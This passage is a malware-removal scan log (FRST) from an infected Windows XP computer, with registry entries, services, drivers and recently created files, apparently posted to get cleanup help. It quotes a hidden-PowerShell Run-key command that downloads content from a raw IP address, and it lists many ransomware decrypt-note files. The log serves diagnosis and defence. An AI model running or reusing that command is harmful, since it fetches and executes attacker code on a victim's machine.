<====== ATTENTION HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\...\Run: [WinSystem] => cmd.exe /c start powershell -windowstyle hidden -noninteractive -command "$a = New-Object System.Net.WebClient; $b = $a.DownloadString('http://31.184.194.99:85/landin2?action=psf&pubid=0&subid=0&syste(the data entry has 30 more characters). HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\...\Policies\Explorer: [TaskbarNoNotification] 1 HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_8_800_94_ActiveX.exe [814984 2013-07-10] (Adobe Systems Incorporated) BootExecute: autocheck autochk * sdnclean.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1202660629-1592454029-1801674531-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation) BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) Toolbar: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://windowsupdate.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1373238207218 Handler: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL (Microsoft Corporation) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File Hosts: 127.0.0.1 localhost Tcpip\..\Interfaces\{2F7F9507-2545-4C5C-B1F8-0A880BE407A7}: [NameServer] 8.8.8.8 FireFox: ======== FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\3.0.40818.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @Microsoft.com/NpWinExt,version=4.0 -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-09-27] FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox FF Extension: MSN Toolbar - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox [2014-09-10] FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2014-09-10] Chrome: ======= CHR Profile: C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-17] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-17] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-17] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-17] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-17] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-17] CHR Extension: (Chrome Hotword Shared Module) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-06] CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-17] CHR Extension: (Gmail) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-17] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2013-07-10] (Macrovision Europe Ltd.) [File not signed] S2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed] R2 ioloSystemService; C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe [4702920 2015-02-12] (iolo technologies, LLC) S2 mcbootdelaystartsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) S2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) S2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) S2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) S2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.) R2 MSSQL$EXAKTIME; c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-25] (Microsoft Corporation) S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [45408 2008-11-25] (Microsoft Corporation) R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.) R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.) S2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.) S3 Dot4Scan; C:\WINDOWS\System32\DRIVERS\Dot4Scan.sys [8704 2001-08-17] (Microsoft Corporation) S3 DS2490; C:\WINDOWS\System32\Drivers\DS2490.sys [50036 2007-01-16] (Dallas Semiconductor MAXIM) [File not signed] R1 FileDisk; C:\WINDOWS\system32\Drivers\FileDisk.sys [9341 2013-03-17] (iolo technologies, LLC (based on original work by Bo Brantén)) [File not signed] S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.) S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [35992 2015-03-07] () S3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard) S3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard) R3 ialm; C:\WINDOWS\System32\DRIVERS\igxpmp32.sys [5760096 2007-04-16] (Intel Corporation) [File not signed] R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtkHDAud.sys [4652544 2008-01-15] (Realtek Semiconductor Corp.) [File not signed] S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [114904 2015-03-07] (Malwarebytes Corporation) S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.) S3 mfebopk; C:\WINDOWS\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [350240 2014-08-20] (McAfee, Inc.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [81296 2014-08-20] (McAfee, Inc.) S3 mfendisk; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.) R3 mfendiskmp; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.) R1 mfetdi2k; C:\WINDOWS\System32\drivers\mfetdi2k.sys [93624 2014-06-20] (McAfee, Inc.) S3 PalmUSBD; C:\WINDOWS\System32\drivers\PalmUSBD.sys [16694 2013-12-05] (PalmSource, Inc.) [File not signed] R2 PDFsFilter; C:\WINDOWS\System32\DRIVERS\PDFsFilter.sys [69016 2015-02-12] (Raxco Software, Inc.) S3 WLRAWMp50x86; C:\WINDOWS\System32\Drivers\WLRAWMp50x86.sys [28312 2010-10-06] (Logitech, Inc.) S3 WLRAWSp50x86; C:\WINDOWS\System32\Drivers\WLRAWSp50x86.sys [27032 2010-10-06] (Logitech, Inc.) S3 catchme; \??\C:\DOCUME~1\Maureen\LOCALS~1\Temp\catchme.sys [X] S0 cerc6; No ImagePath S4 IntelIde; No ImagePath U0 mfewfpk; No ImagePath ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2015-03-07 19:03 - 2015-03-07 18:54 - 00449968 ____R () C:\WINDOWS\system32\Drivers\etc\hosts.20150307-190320.backup 2015-03-07 18:54 - 2015-03-07 18:40 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20150307-185420.backup 2015-03-07 18:44 - 2015-03-07 18:56 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp 2015-03-07 18:44 - 2015-03-07 18:44 - 00017476 _____ () C:\ComboFix.txt 2015-03-07 18:44 - 2015-03-07 18:44 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\temp 2015-03-07 18:44 - 2015-03-07 18:44 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp 2015-03-07 18:24 - 2015-03-07 18:45 - 00000000 ____D () C:\ComboFix 2015-03-07 18:11 - 2015-03-07 18:19 - 00065536 _____ () C:\WINDOWS\system32\config\SpybotSD.evt 2015-03-07 17:18 - 2015-03-07 18:57 - 00000644 _____ () C:\WINDOWS\Tasks\Check for updates (Spybot - Search & Destroy).job 2015-03-07 17:18 - 2015-03-07 17:18 - 00000616 _____ () C:\WINDOWS\Tasks\Refresh immunization (Spybot - Search & Destroy).job 2015-03-07 17:18 - 2015-03-07 17:18 - 00000446 _____ () C:\WINDOWS\Tasks\Scan the system (Spybot - Search & Destroy).job 2015-03-07 17:17 - 2015-03-07 18:08 - 00065536 _____ () C:\WINDOWS\system32\config\Spybot -.evt 2015-03-07 17:16 - 2015-03-07 17:17 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Spybot - Search & Destroy 2 2015-03-07 17:16 - 2015-03-07 17:16 - 00001842 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Spybot-S&D Start Center.lnk 2015-03-07 17:16 - 2015-03-07 17:16 - 00001836 _____ () C:\Documents and Settings\All Users\Desktop\Spybot-S&D Start Center.lnk 2015-03-07 17:16 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\WINDOWS\system32\sdnclean.exe 2015-03-07 17:15 - 2015-03-07 17:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2 2015-03-07 05:14 - 2015-03-07 18:53 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy 2015-03-07 05:14 - 2015-03-07 18:11 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2015-03-07 03:08 - 2015-03-07 03:18 - 00000000 ____D () C:\AdwCleaner 2015-03-07 03:02 - 2015-03-07 03:02 - 00003758 _____ () C:\Documents and Settings\Maureen\Desktop\Rkill.txt 2015-03-07 02:14 - 2015-03-07 02:14 - 00001512 _____ () C:\Documents and Settings\All Users\Desktop\Recuva.lnk 2015-03-07 02:14 - 2015-03-07 02:14 - 00000000 ____D () C:\Program Files\Recuva 2015-03-07 02:14 - 2015-03-07 02:14 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Recuva 2015-03-06 19:36 - 2015-03-06 19:36 - 00000909 _____ () C:\Documents and Settings\Maureen\Desktop\JRT.txt 2015-03-06 19:23 - 2015-03-06 19:23 - 00090112 _____ () C:\WINDOWS\Minidump\Mini030615-02.dmp 2015-03-06 18:16 - 2015-03-06 18:16 - 00001324 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\d3d9caps.tmp 2015-03-06 17:10 - 2015-03-06 17:10 - 00000924 _____ () C:\Documents and Settings\Maureen\Desktop\Process Explorer.lnk 2015-03-06 17:02 - 2015-03-06 17:01 - 00090112 _____ () C:\WINDOWS\Minidump\Mini030615-01.dmp 2015-03-06 12:37 - 2008-04-13 14:12 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe 2015-03-06 12:36 - 2008-04-13 14:12 - 01033728 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2015-03-06 08:01 - 2015-03-07 18:59 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\AV SOFTWARES 2015-03-06 07:09 - 2015-03-06 07:09 - 00001580 _____ () C:\Documents and Settings\All Users\Desktop\Defraggler.lnk 2015-03-06 07:09 - 2015-03-06 07:09 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Defraggler 2015-03-06 07:08 - 2015-03-06 07:12 - 00000000 ____D () C:\Program Files\Defraggler 2015-03-06 00:53 - 2015-03-07 05:31 - 00114904 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2015-03-06 00:52 - 2015-03-06 00:53 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk 2015-03-06 00:51 - 2015-03-06 00:52 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware 2015-03-06 00:50 - 2015-03-06 00:50 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware 2015-03-06 00:50 - 2014-11-21 06:14 - 00054360 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2015-03-06 00:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys 2015-03-06 00:39 - 2015-03-06 00:39 - 00145798 ____N () C:\bootex.log 2015-03-06 00:37 - 2015-03-06 00:37 - 00000000 ____D () C:\found.001 2015-03-06 00:08 - 2015-03-07 19:15 - 00000000 ____D () C:\FRST 2015-03-06 00:07 - 2015-03-06 00:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\iolo 2015-03-05 23:48 - 2015-03-05 23:48 - 00000000 ___HD () C:\WINDOWS\PIF 2015-03-05 23:35 - 2015-03-06 00:20 - 00001611 _____ () C:\Documents and Settings\Maureen\Desktop\McAfee SecurityCenter.lnk 2015-03-05 22:56 - 2015-03-05 22:56 - 00000000 _RSHD () C:\cmdcons 2015-03-05 22:56 - 2015-03-05 19:33 - 00000211 _____ () C:\Boot.bak 2015-03-05 22:56 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr 2015-03-05 22:47 - 2015-03-07 19:15 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\temp 2015-03-05 22:17 - 2015-03-05 22:17 - 00008192 ____H () C:\WINDOWS\system32\config\SECURITY.tmp.LOG 2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\system.tmp.LOG 2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\software.tmp.LOG 2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\SAM.tmp.LOG 2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\default.tmp.LOG 2015-03-05 21:43 - 2011-06-26 01:45 - 00256000 _____ () C:\WINDOWS\PEV.exe 2015-03-05 21:43 - 2010-11-07 12:20 - 00208896 _____ () C:\WINDOWS\MBR.exe 2015-03-05 21:43 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00098816 _____ () C:\WINDOWS\sed.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00080412 _____ () C:\WINDOWS\grep.exe 2015-03-05 21:43 - 2000-08-30 19:00 - 00068096 _____ () C:\WINDOWS\zip.exe 2015-03-05 21:33 - 2015-03-07 18:44 - 00000000 ____D () C:\Qoobox 2015-03-05 21:33 - 2015-03-05 22:24 - 00000000 ____D () C:\WINDOWS\erdnt 2015-03-05 19:53 - 2015-03-07 18:51 - 00000000 __SHD () C:\WINDOWS\CSC 2015-03-05 19:44 - 2015-03-05 19:52 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RogueKiller 2015-03-05 19:44 - 2015-03-05 19:44 - 00035064 _____ () C:\WINDOWS\system32\Drivers\TrueSight.sys 2015-03-05 19:34 - 2015-03-05 19:34 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\Share-to-Web Upload Folder 2015-03-05 19:30 - 2015-03-05 19:30 - 00000803 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Internet Explorer.lnk 2015-03-05 19:30 - 2015-03-05 19:30 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk 2015-03-05 19:30 - 2015-03-05 19:30 - 00000171 _____ () C:\WINDOWS\wmsetup.log 2015-03-05 19:30 - 2015-03-05 19:30 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache 2015-03-05 19:30 - 2015-03-05 19:30 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google 2015-03-05 19:29 - 2015-03-05 19:35 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini 2015-03-05 19:29 - 2015-03-05 19:30 - 00000738 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Outlook Express.lnk 2015-03-05 19:29 - 2015-03-05 19:30 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories 2015-03-05 19:29 - 2015-03-05 19:30 - 00000000 ____D () C:\Documents and Settings\Administrator 2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\Local Settings\HELP_DECRYPT.HTML 2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_DECRYPT.HTML 2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\HELP_DECRYPT.HTML 2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\Local Settings\HELP_DECRYPT.URL 2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_DECRYPT.URL 2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\HELP_DECRYPT.URL 2015-03-05 19:29 - 2013-07-07 17:50 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk 2015-03-05 19:13 - 2015-03-05 19:18 - 00000285 _____ () C:\Documents and Settings\Maureen\Desktop\DCOM Policy Edit.txt 2015-03-05 11:25 - 2015-03-07 18:58 - 00100906 _____ () C:\WINDOWS\WindowsUpdate.log 2015-03-05 11:25 - 2015-03-07 02:22 - 00038782 _____ () C:\WINDOWS\setupapi.log 2015-03-05 11:24 - 2015-03-05 11:24 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware 2015-03-05 11:09 - 2015-03-05 11:09 - 00000682 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk 2015-03-05 11:09 - 2015-03-05 11:09 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner 2015-03-05 11:08 - 2015-03-05 11:09 - 00000000 ____D () C:\Program Files\CCleaner 2015-03-05 09:28 - 2015-03-07 19:01 - 00000680 _____ () C:\WINDOWS\Tasks\Windows Updates.job 2015-03-03 18:15 - 2015-03-03 18:15 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\McAfee 2015-02-26 18:17 - 2015-02-27 00:55 - 02359350 _____ () C:\Documents and Settings\Maureen\My Documents\!Decrypt-All-Files-fuarzfg.bmp 2015-02-26 18:17 - 2015-02-27 00:54 - 00001266 _____ () C:\Documents and Settings\Maureen\My Documents\!Decrypt-All-Files-fuarzfg.txt 2015-02-26 18:07 - 2015-02-26 18:07 - 00008604 _____ () C:\HELP_DECRYPT.HTML 2015-02-26 18:07 - 2015-02-26 18:07 - 00004242 _____ () C:\HELP_DECRYPT.TXT 2015-02-26 18:07 - 2015-02-26 18:07 - 00000288 _____ () C:\HELP_DECRYPT.URL 2015-02-26 15:16 - 2015-02-26 18:17 - 01804189 _____ () C:\Documents and Settings\All Users\Application Data\aqclain.html 2015-02-26 14:34 - 2015-02-26 14:34 - 00001806 _____ () C:\Documents and Settings\All Users\Desktop\System Mechanic Professional.lnk 2015-02-26 01:32 - 2015-02-26 08:23 - 00000000 ___HD () C:\Documents and Settings\Maureen\Application Data\DC3EEDD7 2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML 2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML 2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\Maureen\My Documents\HELP_DECRYPT.HTML 2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\Maureen\HELP_DECRYPT.HTML 2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML 2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL 2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL 2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\Maureen\My Documents\HELP_DECRYPT.URL 2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\Maureen\HELP_DECRYPT.URL 2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\HELP_DECRYPT.URL 2015-02-25 19:19 - 2015-02-25 19:19 - 00008604 _____ () C:\Documents and Settings\Maureen\Local Settings\HELP_DECRYPT.HTML 2015-02-25 19:19 - 2015-02-25 19:19 - 00008604 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.HTML 2015-02-25 19:19 - 2015-02-25 19:19 - 00000288 _____ () C:\Documents and Settings\Maureen\Local Settings\HELP_DECRYPT.URL 2015-02-25 19:19 - 2015-02-25 19:19 - 00000288 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.URL 2015-02-25 14:59 - 2015-02-25 14:59 - 00008604 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.HTML 2015-02-25 14:59 - 2015-02-25 14:59 - 00000288 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 